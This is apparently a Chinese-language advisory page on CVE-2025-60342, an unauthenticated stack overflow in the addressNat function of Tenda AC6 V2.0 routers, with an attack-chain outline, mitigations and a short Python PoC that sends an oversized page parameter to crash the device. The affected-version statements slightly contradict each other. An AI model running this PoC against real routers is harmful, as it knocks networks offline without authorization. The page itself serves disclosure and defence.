CVE-2025-60342 CVSS 7.5 高危

CVE-2025-60342 Tenda AC6 V2.0 addressNat函数栈溢出拒绝服务漏洞

披露日期: 2025-10-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-60342

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC6 V2.0

漏洞概述

CVE-2025-60342是影响Tenda AC6 V2.0路由器15.03.06.50版本的一个高危安全漏洞。该漏洞存在于设备Web管理界面的addressNat函数中，由于对用户输入的page参数缺乏有效的边界检查，导致攻击者可以通过构造超长字符串触发栈溢出。攻击者无需认证即可远程利用此漏洞，发送精心设计的恶意请求即可造成设备拒绝服务，使路由器无法正常提供网络服务。此漏洞的CVSS评分为7.5，属于高危级别，攻击复杂度低，无需特殊权限或用户交互即可成功利用。建议用户尽快升级到厂商发布的安全补丁或采取临时缓解措施来防止潜在攻击。

技术细节

该漏洞是由于Tenda AC6 V2.0路由器固件中的addressNat函数存在栈缓冲区溢出所致。在处理HTTP请求中的page参数时，程序将用户可控的输入直接复制到栈上的固定大小缓冲区中，未进行长度验证。当攻击者发送包含超长字符串的page参数时，溢出的数据会覆盖栈帧中的返回地址、保存的寄存器等关键信息，最终导致程序控制流被劫持或崩溃。由于该漏洞出现在Web管理接口的处理逻辑中，且设备默认监听在WAN口，远程攻击者可以直接通过HTTP请求触发漏洞。成功利用后，攻击者可导致路由器重启或持续崩溃，造成网络中断。攻击者无需获取管理员凭证即可发起攻击，这大大增加了漏洞的严重性和被利用的风险。

攻击链分析

STEP 1

步骤1

攻击者识别目标Tenda AC6 V2.0路由器并确定其IP地址，通常为192.168.0.1或通过WAN口暴露的公网地址

STEP 2

步骤2

攻击者构造包含超长字符串的恶意HTTP请求，将page参数设置为超过缓冲区大小的数据

STEP 3

步骤3

攻击者通过HTTP GET请求向路由器的addressNat端点发送恶意payload

STEP 4

步骤4

路由器Web服务处理请求时，未对page参数进行长度检查直接将数据复制到栈缓冲区

STEP 5

步骤5

超长数据溢出栈缓冲区，覆盖返回地址和栈帧信息，导致程序控制流被破坏

STEP 6

步骤6

路由器进程崩溃或重启，造成网络服务中断，实现拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60342 PoC - Tenda AC6 V2.0 addressNat Stack Overflow
# Target: Tenda AC6 V2.0 Router
# Vulnerability: Stack overflow in page parameter of addressNat function

target_ip = "192.168.0.1"  # Router IP address
target_port = 80

# Construct malicious payload with oversized page parameter
# The vulnerability allows causing DoS via crafted input
payload_size = 1000  # Size sufficient to overflow the buffer
malicious_page = "A" * payload_size

url = f"http://{target_ip}:{target_port}/addressNat"
params = {
    "page": malicious_page
}

try:
    print(f"[*] Sending exploit to {url}")
    print(f"[*] Payload size: {payload_size} bytes")
    response = requests.get(url, params=params, timeout=5)
    print(f"[*] Response status: {response.status_code}")
    print("[*] Exploit sent. Router may crash or become unresponsive.")
except requests.exceptions.RequestException as e:
    print(f"[*] Exploit completed. Error: {e}")
    print("[*] Router may have crashed or blocked the request.")

影响范围

Tenda AC6 V2.0 firmware < 15.03.06.50

防御指南

临时缓解措施

临时缓解措施：在路由器管理界面中禁用WAN口的Web管理功能，仅允许通过LAN口本地访问管理界面；同时在网络边界防火墙上阻断对路由器80端口（HTTP）和443端口（HTTPS）的外部访问；如无法立即升级固件，可考虑使用ACL规则限制对管理接口的访问来源IP范围。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表